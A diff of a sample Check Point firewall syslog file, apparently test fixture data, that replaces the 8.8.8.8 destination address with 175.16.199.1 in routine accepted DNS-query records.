-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33482"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44801"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49981"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38377"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34858"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33482"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44801"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49981"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38377"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34858"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53160"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44804"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddee,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56900"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56900"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38570"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60255"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47035"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60255"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47035"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51572"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58828"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
